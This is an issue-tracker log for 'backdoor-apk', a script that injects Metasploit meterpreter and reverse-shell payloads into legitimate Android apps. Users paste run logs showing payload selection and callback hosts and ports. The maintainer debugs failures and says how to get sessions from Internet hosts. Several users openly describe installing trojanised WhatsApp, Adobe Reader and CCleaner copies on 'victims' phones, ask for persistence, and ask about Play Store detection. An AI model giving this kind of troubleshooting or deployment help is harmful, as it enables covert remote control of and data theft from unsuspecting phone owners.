[2016-10-06 05:30] #43 closed

[2016-10-06 17:15] Emilien942702 commented on #41
@dana-at-cp Just tried, got
[code]
Think the extraction is right, expect that you need to filter the first strings :)

[2016-10-06 17:32] dana-at-cp commented on #41
@Emilien942702 Thanks for testing. It seems that the "[[:alpha:]]" in the regex doesn't account for different languages. :)

[code]

[2016-10-07 03:53] dana-at-cp commented on #41
@Emilien942702 There is a new change on the "cert_dname_fix" branch. Can you try it out when you have a few minutes?

[2016-10-07 13:53] samuelmwai opened #44 "Failed to decompile RAT APK file"
[*] Generating RAT APK file...done.
[+] Using payload: android/meterpreter/reverse_tcp
[+] Handle the reverse connection at: 192.168.x.x:4444
[*] Decompiling RAT APK file...done.
[!] Failed to decompile RAT APK file

Hi, it fails to decompile and throws the attached error. Below is an extract of the run.log file

No encoder or badchars specified, outputting raw payload
Payload size: 9310 bytes
Sav

[2016-10-07 16:15] Emilien942702 commented on #41
@dana-at-cp just tried, signing apk is OK but now i get
[code]
And here is the log : (checked, zipalign is in the right folder and to be sure i cloned the whole folder back again from cert_dname_fix branch and relaunched it,  gave the same results)

[2016-10-12 21:15] dana-at-cp commented on #41
@Emilien942702 Sounds like you are missing a library that will allow you to run the zipalign 32-bit binary on 64-bit Linux. :)

Try this stackoverflow thread to get an idea of what you might be missing or how to troubleshoot further:

http://stackoverflow.com/questions/2716702/no-such-file-or-directory-error-when-executing-a-binary

[2016-10-12 21:16] dana-at-cp commented on #41
@Emilien942702 I think the original issue is resolved with the changes on the "cert_dname_fix" branch.

[2016-10-16 21:16] userdsp commented on #44
Update your Apktool version.

[2016-10-17 09:47] gaurav9991 opened #45 "Failed to copy RAT smali files"
Hi,

Script fails because _payload/smali/com/metasploit/stage/MainBroadcastReceiver.smali_ file is not present.

_payload/smali/com/metasploit/stage_ directory has only 1 file - _MainActivity.smali_

[code]

[2016-10-17 15:51] samuelmwai commented on #44
I have cloned the apk tool from the latest branch. Still experiencing same error. Have tried with a few apks sourced from Apk4fun. Attached is the run log file
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/533924/run.log.tar.gz)
The required lib files i.e. lib32stdc++6 lib32ncurses5 lib32z1 are also upto to date. Refer screenshot
[Lib.tar.gz](https://github.com/dana-at-cp/backd

[2016-10-17 16:33] dana-at-cp commented on #45
@gaurav9991 Thanks for reporting the issue. Is this Metasploit on Kali Linux? If not, can you describe your environment and how you are obtaining Metasploit?

[2016-10-17 16:51] dana-at-cp commented on #41
@Emilien942702 The fix is now on the master branch. Merged #46 earlier today.

[2016-10-17 16:51] #41 closed

[2016-10-17 16:54] dana-at-cp commented on #44
@samuelmwai I suspect that this is an issue with the APK file itself. Try using a legitimate APK from the Google Play store.

[2016-10-17 17:26] samuelmwai commented on #44
I had not looked at this. Let me give it a shot. Thank you for the link.

[2016-10-17 18:21] gaurav9991 commented on #45
Hi @dana-at-cp,

I fixed the issue by updating Metasploit by _msfupdate_ command. Yes, I was using Kali Linux.

[2016-10-17 18:21] #45 closed

[2016-10-17 19:42] samuelmwai commented on #44
Hi Dana,

I have managed. I had not set the Java environment correctly. I followed this link https://ibotpeaches.github.io/Apktool/install/ as well as https://www.blackmoreops.com/2015/08/15/how-to-install-java-in-kali-linux-2-0-kali-sana/. The Apk to be used is also a factor to consider as i have tried with two Apks. One from Google-play and the other from apk4fun. I have documented the errors in

[2016-10-17 19:43] #44 closed

[2016-10-17 19:53] dana-at-cp commented on #44
@samuelmwai Awesome! You will have better luck with APKs you obtain from the play store.

[2016-10-17 19:53] dana-at-cp commented on #45
@gaurav9991 Great! Glad you got it sorted.

[2016-10-17 20:10] PaulElM opened #47 "Recompile problem"
[*] Running backdoor-apk.sh v0.1.4 on Mon Oct 17 22:05:27 CEST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.153
[?] Please enter an LPORT value: 9999
[*] Generating

[2016-10-18 01:29] dana-at-cp commented on #47
@PaulElM Kali Linux rolling? Is Apktool installed/setup correctly?

https://ibotpeaches.github.io/Apktool/install/

[2016-10-18 01:34] PaulElM commented on #47
Thanks for the reply!
yeah apktool is installed .. tried apt-get install apktool => latest version
and i install it as mentioned here https://ibotpeaches.github.io/Apktool/install/
and im root on the system
how i can fix it?

[2016-10-23 01:56] Abdulmalik5371 commented on #30
Hi guys, am having the same issue on Kali Linux. Please Help and when i try updating lib32 files, it denies.

[*] Running backdoor-apk.sh v0.1.5 on Sat Oct 22 16:27:36 EDT 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload o

[2016-10-23 15:20] anthonychaseparsons1 commented on #30
Did you try the command I posted earlier?
sudo apt-get install lib32zl lib32ncurses5 lib32stdc++6

[2016-10-25 13:39] dana-at-cp commented on #47
@PaulElM Any update on this? Have you tried different APKs?

[2016-10-25 14:16] PaulElM commented on #47
tried other apk and i have the same problem
can u do me a favor and give me the apktool version that u are using?

[2016-10-25 15:29] dana-at-cp commented on #47
@PaulElM I'm using the latest Apktool version within Kali Linux rolling.

[code]

[2016-10-25 15:33] dana-at-cp commented on #47
@PaulElM Just confirmed that the latest version of backdoor-apk is working as expected on my system.

[code]

[2016-10-25 16:02] PaulElM commented on #47
root@Paulzz:/usr/bin# which apktool
/usr/local/bin/apktool
root@Paulzz:/usr/bin# apktool -version
2.2.0
root@Paulzz:/usr/bin# apt-get install apktool
Reading package lists... Done
Building dependency tree
Reading state information... Done
apktool is already the newest version (2.2.0+dfsg-1).
0 upgraded, 0 newly installed, 0 to remove and 198 not upgraded.

And the same problem :(
root@Paulzz:/var/

[2016-10-25 16:07] PaulElM commented on #47
tried with pandora and it worked!!!

[2016-10-25 16:12] dana-at-cp commented on #47
@PaulElM Ok. Cool. Always try legitimate APKs (from the Google Play Store) to try and rule out issues with Apktool. If you are dealing with random APKs out on the Internet you will likely encounter problems with Apktool.

I'm going to close this issue since it seems the problem was with a specific, illegitimate APK file.

[2016-10-25 16:13] #47 closed

[2016-11-02 18:28] nmapgithub opened #50 "contact"
hey bro tell me from where should ii ilearn bash scriipting as u did in backdoor.sh any website or boook? please

[2016-11-04 19:56] dana-at-cp commented on #50
@nmapgithub Mostly a mix of experience and consulting man pages and Google when I'm not sure how to do something.

Good luck. :)

[2016-11-04 19:56] #50 closed

[2016-11-06 09:49] Abdulmalik5371 commented on #30
Anthonychaseparsons1,
Thanks i got the install and it worked for me. But am having a problem,when i try to install the signed apk in the victims phone it says install failed. If you have solution for that please help. I tried today with adobe reader apk and it worked but after opening the application on victim phone it says "unfortunately adobe reader stopped workining"  Kindly help because i cant

[2016-11-14 16:41] userdsp opened #51 "[!] Failed to recompile original project with backdoor"
[run.log.txt](https://github.com/dana-at-cp/backdoor-apk/files/589867/run.log.txt)

[2016-11-16 02:38] userdsp commented on #51
apktool -version 2.2.1

[2016-11-16 14:37] maklmakl opened #52 "[!] Failed to align recompiled APK"
Hi
F.O ALL i want to thank you for your powerful project and for all you did ..

while i use your project backdoor-apk
i got error : [!] Failed to align recompiled APK
i read the previous  solved issues
but it still get me that message
any help ?

& here is Run.log file :
[run.log.tar.gz](https://github.com/dana-at-cp/backdoor-apk/files/594878/run.log.tar.gz)
thx ...

[2016-11-17 16:43] dana-at-cp commented on #52
@maklmakl Can you do the following on your system and share the output?

[code]

[code]
Look for zipalign in the "third-party" directory included in the backdoor-apk project.

[2016-11-17 16:44] dana-at-cp commented on #51
@userdsp Hello. Is backdoor-apk working on other APK files?

[2016-11-19 03:18] acordeonmorado opened #53 "The dname extraction logic fails on some unconventional APK certs"
Hello, i have a problem with this:

[!]failed to generate RSA key
 or also recompiling original project with backdoor, with others apk files.

apktool version 2.20
java version 1.8.0_102
I have 32 bit libraries ia32libs
both files in usr/local/bin and are executable.

any solution?? Thanks anyway

[2016-11-19 18:14] maklmakl commented on #52
![screenshot from 2016-11-19 20-13-08](https://cloud.githubusercontent.com/assets/23502715/20457464/aceaacea-ae94-11e6-86c1-ec0f228b784a.png)
i got this ????????????

[2016-11-21 07:58] macbook47 commented on #52
i got this error too, i think something wrong with zipalign on third party, so i manually install zipalign through apt-get install zipalign and edited backdoor-apk.sh in line 28 from
ZIPALIGN= third-party/android-sdk-linux/build-tools/23.0.3/zipalign
to
ZIPALIGN=zipalign

and voila, its worked 💃

[2016-11-21 15:09] ichsanrendi24 opened #54 "After inject and install, apllication get "force close"
hi, i tried to rebuilding infectedapk like as you. but, when i instal that, aplication get force close. i triedwith whatsapp and b612 but it's same get error force close. do you know why ? please help me. thanks

[2016-11-21 21:09] dana-at-cp commented on #52
@maklmakl @macbook47 This thread helps explain why you get that error on 64-bit Linux systems:

http://stackoverflow.com/questions/2716702/no-such-file-or-directory-error-when-executing-a-binary

[2016-11-21 21:09] #52 closed

[2016-11-22 13:32] dana-at-cp commented on #54
@ichsanrendi24 Where did you get the APK files? The source matters quite a bit.

[2016-11-22 13:33] dana-at-cp commented on #53
@acordeonmorado Does this occur with a particular APK file or with all APK files on your system?

[2016-11-22 23:04] maklmakl commented on #54
i downloaded from Google
any recommended sites?

[2016-11-22 23:30] maklmakl opened #55 "application always get ' unfortunately app has stopped '"
its always get that annoying error
i tried different apks from different sites !
and always get this ?
any help ?

![screenshot_2016-11-23-01-24-04](https://cloud.githubusercontent.com/assets/23502715/20546160/22de09fe-b11c-11e6-8070-cb1cccc4db3e.png)

[2016-11-23 17:35] userdsp commented on #51
No. It's the same at all apk!

[2016-11-27 14:43] userdsp commented on #51
It was working before until I delete the main folder to get git clone again with the last update! Now I receive this error message :(

[2016-11-28 11:15] winner91 commented on #55
i tried many apk files from different sources I got the same problem. any idea on what's causing it  ?

[2016-11-28 16:01] dana-at-cp commented on #55
@maklmakl @winner91 Can you guys share some details of your environments? Is this Kali rolling? Are you using Metasploit that is included with Kali? Any other additional information you think might be useful.

In the meantime, I'll update my instance of Kali and test for similar issues.

[2016-11-28 16:03] dana-at-cp commented on #54
@maklmakl I assume from the Google Play store? Also, I'm going to close the issue you created as it appears to be a duplicate of this issue.

[2016-11-28 16:04] dana-at-cp commented on #55
Closing as duplicate of issue: #54

[2016-11-28 16:04] #55 closed

[2016-11-28 22:18] dana-at-cp commented on #54
@ichsanrendi24 @maklmakl I was able to recreate the issue on my updated version of Kali Linux. I can only assume that something changed in Metasploit at this time. I'll look into it ASAP.

[2016-11-29 01:24] acordeonmorado commented on #53
with all files, except a flash.apk (facebook)from aptoide. With the newest versions doesnt work. Thanks

[2016-11-29 14:30] userdsp commented on #51
Thank you @dana-at-cp (Dwight Spencer) after you email me "did you even install the android-sdk and the android-ndk? you should do that first.
"
This message is in the past :)

[2016-11-29 14:53] userdsp commented on #51
root@kali:~/backdoor-apk/backdoor-apk# apt-get update
Hit:1 http://mirrors.netix.net/kali kali-rolling InRelease
Reading package lists... Done

root@kali:~/backdoor-apk/backdoor-apk# apt-get install lib32z1 lib32ncurses5 lib32stdc++6
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package lib32z1
E: Unable to locate package lib32ncurses5

[2016-11-29 17:10] dana-at-cp commented on #51
@userdsp There is something wrong with Apktool on your system. From your run.log file:

[code]

[2016-11-29 17:13] dana-at-cp commented on #51
@userdsp Apktool does need those 32bit library packages.

https://ibotpeaches.github.io/Apktool/install/

[2016-11-29 17:18] dana-at-cp commented on #51
@userdsp I am going to close this issue since it is isolated to Apktool on your system.

[2016-11-29 17:18] #51 closed

[2016-11-29 17:19] dana-at-cp commented on #54
@ichsanrendi24 @maklmakl Confirmed that something changed in Metasploit and the backdoor-apk code had some breakage as a result. A fix will be out later today.

[2016-11-29 17:20] dana-at-cp commented on #54
@ichsanrendi24 @maklmakl FYI. If you know how to use 'adb' in the platform tools folder of the Android SDK then you can use 'adb logcat' to get a better idea of why the application is crashing.

[2016-11-29 21:18] dana-at-cp commented on #54
@ichsanrendi24 @maklmakl Fixed in version 0.1.6 on master.

[2016-11-29 21:18] #54 closed

[2016-11-29 21:48] userdsp commented on #51
I have 32bit distro not 64bit,
"apktoold d test.apk" doesnt give any error!

[2016-11-29 21:55] userdsp commented on #51
root@kali:~# apktool d test.apk
I: Using Apktool 2.2.1 on test.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown file

[2016-11-30 03:01] dana-at-cp commented on #51
@userdsp Ah, alright. Glad you got it sorted.

[2016-11-30 03:08] dana-at-cp commented on #53
@acordeonmorado Can you share your run.log file after one of these failures?

[2016-12-01 16:44] islamTaha12 opened #56 "miss d2j-dex2jar file"
Please set the requirements to run the script cos I faced this issue and I got d2j-dex2jar.sh but it still occurred.
[!] Check your environment and configuration. Couldn't find: d2j-dex2jar

[2016-12-01 19:04] dana-at-cp commented on #56
@islamTaha12 There is code that checks that all of the required programs and scripts are in the user's path. In this case, the code detected that "d2j-dex2jar" was not in your path. The code worked precisely as intended.

[code]

[2016-12-01 19:04] #56 closed

[2016-12-03 12:33] meblack commented on #53
same problem here @dana-at-cp
[run.txt](https://github.com/dana-at-cp/backdoor-apk/files/628840/run.txt)

[2016-12-05 16:13] dana-at-cp commented on #53
@meblack Thanks for sharing your run.log file. Can you share the APK that you used as well?

I see this message in the run.log file that gives me some useful information:

[code]

[2016-12-05 20:44] meblack commented on #53
@dana-at-cp thank for your response
here is the link of apk for download
http://dl.apktops.ir/games/2014/08/aftabe-v1.4.3-apktops.ir.apk

[2016-12-08 16:21] dana-at-cp commented on #53
@meblack The existing code doesn't like the dname value in the original APK certificate.

[code]

I know how to fix it and will get it done ASAP.

[2016-12-10 20:29] polloditu commented on #53
Hi , first of all, thank you for sharing your talents. I don't know any programming but I have a natural skill for using reason and solving problems . So I will share an alternate solution for users and a suggestion for Dana

Looking at the log , I've found an error with the "dname" variable . The output looked something like this ..

dname= **_Owner: Name EMAIL=blah@bla_** CN=Anon Nymous, OU=Anim

[2016-12-12 11:08] dytra opened #57 "Failed to copy RAT smali files"
Hi I'm having problem using this tool.the original apk in the backdoor-apk directory
`cd /opt/backdoor-apk/backdoor-apk`
`./backdoor-apk.sh org.telegram.messenger_v3.15.0-8841_Android-4.0.apk`
Then it stops at `[!] Failed to copy RAT smali files`

[run.log](https://gist.github.com/dytra/045a37012b2ba6aea651f49120f40914)

[2016-12-12 18:12] dana-at-cp commented on #53
@polloditu Thanks for sharing your workaround; however, there is a proper fix on the 'develop' branch now.

[2016-12-14 14:22] meblack opened #58 "Processed WhatsApp APK crashes on start"
the infected apk its not running on android 6

[2016-12-14 14:24] meblack commented on #58
after install the apk , the program is not running and stopped
and no session has was created

[2016-12-14 14:59] dana-at-cp commented on #58
@meblack Need more information.

- What is the APK?
- Where did you download the APK?
- Does the APK work before injection via backdoor-apk?
- Does the APK work on any other versions of Android?

[2016-12-14 15:07] meblack commented on #58
i tried with whatsapp
i download it from whatsapp website
thats first try for injection test
the problem is:
its installed but not running
i test it on android 5 and 6
in both of them its not run and got the stopped error

[2016-12-14 17:44] dana-at-cp commented on #58
@meblack I confirmed the same behavior for WhatsApp on an emulated Android 4.4 device. The problem seems to be isolated to the WhatsApp APK. This will be a low priority for me to review. How are your Android app debugging skills? Do you know the Android SDK and smali well?

[2016-12-14 17:52] meblack commented on #58
i tried it with many apk files and none of them have not run at all.
could you please give me an apk file that work with this method properly ?

[2016-12-14 18:01] dana-at-cp commented on #58
@meblack I use Pandora as a benchmark. It's still working as of today. Are you getting all of the APKs from the Google Play Store or from sites like apkmirror?

[2016-12-14 18:03] meblack commented on #58
i get them from apkmirror

[2016-12-14 19:02] dana-at-cp commented on #58
@meblack That could be part of your problem. I only use APKs from the Google Play Store.

[2016-12-15 02:28] aminenagx opened #59 "just a question"
Hello dear
what if someone use this shell in play store . It will be detected or not?

[2016-12-15 05:30] dana-at-cp commented on #59
@aminenagx I'm sorry but I cannot answer questions like that here.

[2016-12-15 05:30] #59 closed

[2016-12-16 10:27] vincentcox-ordina opened #60 "Original APK file specified is not valid"
I get the following error if I use an APK file from apkpure.com:
[code]
Any idea's?

[2016-12-16 15:09] dana-at-cp commented on #60
@vincentcox-ordina Please sure the run.log file and the original APK file.

[2016-12-16 15:16] dana-at-cp commented on #57
@dytra Please share the original APK file.

[2016-12-19 07:23] vincentcox-ordina commented on #60
Hi there, Thank you for your response. I have put those files in a zip file:
[data.zip](https://github.com/dana-at-cp/backdoor-apk/files/660337/data.zip)
Thanks in advance!

[2016-12-19 08:29] vincentcox-ordina opened #61 "Parse Error"
Hi there, when I try to install the apk I get a parse error:
![image](https://cloud.githubusercontent.com/assets/23059427/21305628/1720c032-c5cd-11e6-9d2e-cbe9a9cb7b96.png)
It's running the following configuration:
![image](https://cloud.githubusercontent.com/assets/23059427/21305734/96fc170c-c5cd-11e6-8def-cd6fee240d6f.png)

The files (log file + RAT file + original APK file) can be found here:
[

[2016-12-19 08:42] vincentcox-ordina commented on #61
Problem was the source file, I had to use an older version

[2016-12-19 08:42] #61 closed

[2016-12-20 19:40] dana-at-cp commented on #57
@dytra I reviewed the run.log file and it appears that you are using an older version of Metasploit framework.

[code]
Can you update Metasploit and see if the problem goes away?

[2016-12-20 19:45] dana-at-cp commented on #60
@vincentcox-ordina Both of the APKs you shared appear to be invalid or otherwise corrupt.

[code]

The run.log output suggests the du.apk file is invalid as well:

[code]

I'm going to close this issue out. Be mindful of where you obtain APKs. :)

[2016-12-20 19:46] #60 closed

[2016-12-20 19:49] dana-at-cp commented on #57
@dytra I'm going to close this issue out. If you still have problems after updating Metasploit then create a new issue.

[2016-12-20 19:49] #57 closed

[2016-12-20 20:59] dana-at-cp commented on #53
@acordeonmorado @meblack @polloditu This is now fixed in version 0.1.8 on the master branch.

[2016-12-20 20:59] #53 closed

[2016-12-23 08:52] BaraSec opened #62 "Failed to decompile RAT APK file when original APK is not copied to the backdoor-apk directory"
Whatever APK i try, i get this error:

[*] Running backdoor-apk.sh v0.1.8 on Fri Dec 23 03:50:11 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 192.168.1.103
[?] Please ente

[2016-12-23 11:53] BaraSec commented on #62
Solved. Copying the APK file to the script directory solved the issue.
Thanks anyway.

[2016-12-23 15:34] D347HGUN opened #63 "Backdoored APK Location?"
I've successfully ran the tool and it finished with no errors but i dont know where i should find my backdoored apk
The backdoor-apk folder is placed at this directory on my pc: /root/Tools/backdoor-apk/backdoor-apk
Any ideas where i should find the modified apk? and what should it be named after the tool finished creating it?

[2016-12-23 17:26] #63 closed

[2016-12-24 12:15] Ehsan-Abbaspour commented on #57
Hi @dana-at-cp
i have a problem in using this tool:
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[!] Failed to copy RAT smali files

in

[2016-12-25 14:01] misterbee2856 commented on #62
@BaraSec but i'm still failed sir..anyone can solved that..?

[2016-12-25 14:02] misterbee2856 commented on #62
[*] Running backdoor-apk.sh v0.1.8 on Sun Dec 25 20:59:12 HOVT 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: boniw.ddns.net
[?] Please enter an LPORT value: 6969
[+] Handle the

[2016-12-25 14:03] BaraSec commented on #62
copy the original APK file to the ~/backdoor-apk/backdoor-apk folder, and use that file to be backdoored.

[2016-12-25 14:04] misterbee2856 commented on #62
i'll try....thanks before sir...

[2016-12-25 14:07] BaraSec commented on #62
You're welcome,
A feedback about my solution would be much appreciated :)

[2016-12-25 14:18] misterbee2856 commented on #62
i'm still try sir...cause i'm got error Failed to run proguard with specified configuration
hehe..i'm googling now to find the solustion...hehe...
can i set lhost using noip..? i want to try on WAN... or just can work on LAN..?

[2016-12-25 14:19] BaraSec commented on #62
On WAN you need to poer forward in your router.

[2016-12-25 14:27] misterbee2856 commented on #62
yes i has do it...

finally SOLVED Mr @BaraSec thanks for Your HELP and your attention... :) :+1:

[2016-12-25 15:12] jm537 opened #64 "RSA key generation fails when date detects an invalid date string in the original cert valid from line"
hi   error-failed to generate RSA key???

[2016-12-25 15:17] jm537 commented on #64
![ok](https://cloud.githubusercontent.com/assets/24764776/21471770/976e9cf0-cad2-11e6-95dc-9004b4bef6d4.jpg)

[2016-12-25 15:19] jm537 commented on #64
![ok](https://cloud.githubusercontent.com/assets/24764776/21471775/d66f34dc-cad2-11e6-8aed-6166ae161488.jpg)

[2016-12-25 15:20] BaraSec commented on #62
You're Welcome Sir :)

[2016-12-27 14:17] dana-at-cp commented on #63
@D347HGUN It's in the last bit of the README:

[code]

Glad you figured it out. Enjoy! :)

[2016-12-27 14:20] dana-at-cp commented on #64
@jm537 That doesn't look good at all. Can you share the APK file and your run.log file?

[2016-12-27 14:23] dana-at-cp commented on #62
@BaraSec Glad you got it sorted. The original APK file does in fact need to be in the same directory where backdoor-apk.sh resides.

[2016-12-27 14:26] #62 closed

[2016-12-27 16:05] henefesto commented on #64
[run.txt](https://github.com/dana-at-cp/backdoor-apk/files/674346/run.txt)

[2016-12-27 16:08] henefesto commented on #64
[ccleaner.zip](https://github.com/dana-at-cp/backdoor-apk/files/674348/ccleaner.zip)

[2016-12-27 16:39] dana-at-cp commented on #64
@jm537 @henefesto I have a fix that will be on the develop branch later today.

[2016-12-27 17:04] henefesto commented on #64
ok

[2016-12-27 17:21] dana-at-cp commented on #58
@meblack Did you ever try a legit version of Pandora?

I tested it earlier today on an emulated Android 6 device and it worked fine:

[code]

[2016-12-27 17:32] dana-at-cp commented on #64
@jm537 @henefesto The fix is no on the develop branch. Test it out and report back if you can.

[2016-12-27 19:39] henefesto commented on #64
Okay, I'll try

[2016-12-27 19:57] henefesto commented on #64
![captura de pantalla de 2016-12-27 15-55-15](https://cloud.githubusercontent.com/assets/24795407/21507241/05e52598-cc4d-11e6-957c-08eeff8b85dc.png)
Yeah!!

[2016-12-27 21:38] dana-at-cp commented on #64
@henefesto Awesome! Thanks for testing the fix. It will be included in the next release.

[2016-12-28 04:53] jm537 commented on #64
[1.apk.zip](https://github.com/dana-at-cp/backdoor-apk/files/675049/1.apk.zip)
[run.txt](https://github.com/dana-at-cp/backdoor-apk/files/675051/run.txt)

[2016-12-28 04:54] jm537 commented on #64
test another system problem RSA KEY

[2016-12-28 14:21] dana-at-cp commented on #64
@jm537 It looks like you are still running the script from the master branch. The fix for this issue is only on the develop branch at the moment.

[2016-12-30 15:43] dana-at-cp commented on #64
@jm537 @henefesto The fix is now in v0.1.9 on the master branch. Thanks for the bug report and testing help.

[2016-12-30 15:43] #64 closed

[2016-12-31 12:47] Qurexhi opened #65 "Meterpreter persistence on app closure"
bro your tool are great but persistence hook are work only when mobile reboot. so can you add a permanent persistence hook when app close meterpreter still open..

[2017-01-01 04:53] teeknofil commented on #58
Hi, i have crash with much apk of Google Play on meterpreter_http. L'app run and this kill.
<code>
Meterpreter session 12 is not valid and will be closed
</code>

[2017-01-03 14:43] dana-at-cp commented on #65
@Qurexhi Thanks for the suggestion! I'll research what is possible but realize it may not be possible for various reasons.

[2017-01-03 21:24] dana-at-cp commented on #65
@Qurexhi I found [this](http://stackoverflow.com/questions/3667022/checking-if-an-android-application-is-running-in-the-background/13809991#13809991) which may provide some promise.

[2017-01-05 15:40] xnianq opened #66 "I have some error run it.."
When I running it ,i saw..
[!] Check your environment and configuration. Couldn't find: d2j-dex2jar

[2017-01-05 17:20] hyzo90 commented on #58
How do you get Apk file from Google Play Store ?
the option is only to install

[2017-01-05 19:32] dana-at-cp commented on #66
@xnianq You don't have it installed or it's not in your user path.

[2017-01-05 19:32] #66 closed

[2017-01-05 19:33] dana-at-cp commented on #58
@teeknofil Make sure you are running the latest version of Metasploit and backdoor-apk.

[2017-01-05 19:34] dana-at-cp commented on #58
@hyzo90 I use Airdroid to pull APKs off of a device.

[2017-01-05 20:08] Abdulmalik5371 opened #67 "Use backdoor outside lan"
Dana-at-cp, i was wondering if the backdoor-apk can be used outside the LAN...and if its possible kindly guide as to how i can accomplish this. Thanks alot, and congrats on the backdoor it really works wonders for me.

[2017-01-05 20:53] hyzo90 commented on #58
@dana-at-cp oh . okay . will try. Tried the latest APK from Google Play but none works. App always crashes. some Apps working fine but only when the target 1st open it. but when the target closes the app, then session died. not persistent.
maybe I have to update to the latest Jar, ApkTool and Metasploit ?

[2017-01-05 22:19] dana-at-cp commented on #58
@hyzo90 losing the Meterpreter session when the app closes is expected behavior for the time being. The Pandora app from the Google Play Store is a good benchmark. It works nicely 100% of the time in my testing. If there are other legitimate APKs from the Google Play Store that crash on start up after processing then open a new issue so that it can be tracked.

[2017-01-05 22:21] teeknofil commented on #58
@dana-at-cp . OS kali update. Download the Google Play app from http://apps.evozi.com/apk-downloader. All required packages are installer. It must have bug in your application. TheFatRat also has the same bug

[2017-01-06 01:33] dana-at-cp commented on #67
@Abdulmalik5371 Yes, of course. Simply enter the IP or FQDN of a host on the Internet that is prepared to receive the Meterpreter session.

[2017-01-06 01:34] #67 closed

[2017-01-06 01:36] dana-at-cp commented on #58
@teeknofil I wouldn't consider an APK from that source legitimate. Give me a sample APK that you claim does not work.

[2017-01-06 02:36] hyzo90 commented on #58
@dana-at-cp Could you make a tutorial or anything on "how you getting the working APK for your script?"
I personally download all of APK files from APKpure.com .

[2017-01-06 04:39] Abdulmalik5371 commented on #67
Thanks

[2017-01-06 11:13] Qurexhi commented on #65
bro you try this https://github.com/n1nj4sec/pupy in this script you install app, open only one time and server connect everytime when you open but in this script function are limited. bro can you modify your script according this script??

[2017-01-06 14:11] dana-at-cp commented on #58
@hyzo90 Unfortunately, you will have mixed results with APKs from sites like apkpure and apkmirror. Often times APKs from those sources have been tampered. Look into Airdroid as a way to pull legit APKs from an Android device.

[2017-01-06 18:36] Qurexhi commented on #65
hope you add in your next version :+1:

[2017-01-19 16:26] catosx commented on #53
on 1.0.9 can't
Original dname value: CN=Adobe Systems Incorporated, OU=Adobe Reader, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US
Original valid from line: Valid from: Tue May 04 18:00:23 UTC 2010 until: Sat Sep 19 18:00:23 UTC 2037
Original from date: Tue May 04 18:00:23 UTC 2010
Normalized from date: Tue May 04 18:00:23 2010
Original to date: Sat Sep 19 18:00:23 UTC 2037
Normali

[2017-01-19 18:56] dana-at-cp commented on #53
@catosx Simple fix. Run the cleanup.sh script before you run backdoor-apk.sh again.

[2017-01-21 08:35] traget opened #68 "d2j-dex2jar"
Hi!
Sorry to bother..
I'm trying to execute apk-backdoor.sh, but I get this error:
[!] Check your environment and configuration. Couldn't find: d2j-dex2jar

I know your script works fine cuz I guess it's supposed to check some requirements that I do not met..

My question is what do I need to do to get rid of this warning. :P

[2017-01-21 14:24] Miko90 commented on #30
[*] Running backdoor-apk.sh v0.1.9 on Sat Jan 21 09:18:02 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: xxxxx
[?] Please enter an LPORT value: xxxx
[+] Handle the payload v

[2017-01-22 19:24] magix21 opened #69 "Failed to sign recompiled APK"
I am using the english version of parrot and the error is coming

[run+apk.zip](https://github.com/dana-at-cp/backdoor-apk/files/722188/run.apk.zip)

[2017-01-23 08:09] traget commented on #68
I feel a little bit dumb right now cuz I was trying to do: apt-get install d2j-dex2jar :(
For any other person who gets stumbled upon this, you need to do apt-get install dex2jar..
I really feel dumb. :\

[2017-01-23 08:09] #68 closed

[2017-01-23 11:09] traget opened #70 "Question"
Can you run apk-backdoor.sh multiple times whit different apks without running the cleanup.sh script?

[2017-01-24 11:43] traget commented on #66
Just do apt-get install dex2jar :)

[2017-01-24 11:44] traget commented on #66
And then if u get: Couldn't find apktool, do apt-get install apktool

[2017-01-24 11:46] traget commented on #56
Do apt-get install dex2jar :)

[2017-01-24 12:48] Vancer opened #71 "Failed to decompile RAT APK file"
First of all I read the previous issue and i have the apk file in the same directory of the bash script.

Error:
meterpreter/reverse_http 4) shell/reverse_http
meterpreter/reverse_https 5) shell/reverse_https
meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 192.168.1.7
[?] Please enter an LPORT value: 4433
[+] Handle the p

[2017-01-24 14:00] dana-at-cp commented on #71
@Vancer Can you share the run.log file?

[2017-01-24 14:02] dana-at-cp commented on #70
@traget No. The cleanup.sh script should be executed before you run backdoor-apk.sh on another APK file.

[2017-01-24 14:02] #70 closed

[2017-01-24 14:04] dana-at-cp commented on #68
@traget Haha! No problem. Glad you got it sorted.

[2017-01-24 14:08] Vancer commented on #71
Sure I can, there you go:
[Ghostbin Paste](https://ghostbin.com/paste/cmao9)

[2017-01-24 16:57] dana-at-cp commented on #71
@Vancer Ahh, alright. Looks like you are using Apktool 1.5.2 which is pretty old.

My up-to-date Kali VM is running Apktool 2.2.1:

[code]

[2017-01-24 17:18] dana-at-cp commented on #69
